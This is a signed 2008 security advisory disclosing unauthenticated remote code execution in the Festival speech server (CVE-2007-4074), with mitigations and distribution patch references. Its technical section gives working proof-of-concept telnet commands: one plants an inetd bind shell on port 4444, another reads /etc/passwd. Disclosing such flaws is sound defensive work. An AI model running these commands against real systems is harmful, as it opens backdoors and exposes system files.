-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Nth Dimension Security Advisory (NDSA20080215) Date: 15th February 2008 Author: Tim Brown URL: / Product: Festival 1.96:beta July 2004 Vendor: Centre for Speech Technology Research, University of Edinburgh Risk: Medium Summary The Festival server is vulnerable to unauthenticated remote code execution. Further research indicates that this vulnerability has already been reported as a local privilege escalation against both the Gentoo and SuSE GNU/Linux distributions and was assigned CVE-2007-4074. The remote form of this vulnerability was identified in 1.96~beta-5 as distributed in Debian unstable but it is also believed that Ubuntu Hardy Heron was affected. Technical Details The Festival server which can be started using festival --server is vulnerable to unauthenticated remote command execution due to the inclusion of a scheme interpreter. It is possible to make use of standard scheme functions in order to execute further code, like so: $ telnet 10.0.0.1 1314 Trying 10.0.0.1... Connected to 10.0.0.1. (system "echo '4444 stream tcp nowait festival /bin/bash /bin/bash -i' > /tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf") Connection closed by foreign host. Whilst this is the most trivial way that the vulnerability can be exploited the inclusion of a scheme interpreter available without authentication allows for other vectors of attack. Scheme functions such as SayText and tts (which reads a file on the vulnerable system) pose particular interest, for example: $ telnet 10.0.0.1 1314 Trying 10.0.0.1... Connected to 10.0.0.1. (tts "/etc/passwd" nil) Whilst it is acknowledged that the inclusion of the scheme interpreter in this manner is entirely intentional, the default behaviour of the server could be exploited particularly where the user is unaware of the servers existance. In the case of both Debian unstable and Ubuntu Hardy Heron, this meant that the server was likely to be started by the init subsystem albeit as a non-privileged user. Solutions In order to completely protect against the vulnerability (in the short term), Nth Dimension recommend turning off the server or filtering connections to the affected port using a host based firewall. The server itself can be secured by applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477. This includes applying a default configuration which limits access to localhost and setting an optional password which prevents unauthenticated access. Following vendor notification on the 16th Febuary 2007 (Debian) and 2nd March 2007 (Ubuntu), both issued patched versions in their respective distributions which document the possible security issue and how it can be resolved and change the default behaviour of the package to prevent the server being started by the init subsystem. Details of the Debian changes can be found firstly in bug #466146 and then #466796. Nth Dimension would recommend that the patches for these bugs are applied. Nth Dimension would like to thank the Debian package maintainer Kumar Appaiahi as well as Nico Golde of Debian testing security and Jamie Strandboge of Canonical for the way they worked to resolve the issue. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFH9VORVAlO5exu9x8RAj8RAJ9FTxsDc5sQrIpIyNTStiaui5zISwCeMPiW +wuTceT8SGnNjV9mUsilh0w= =dOSa -----END PGP SIGNATURE-----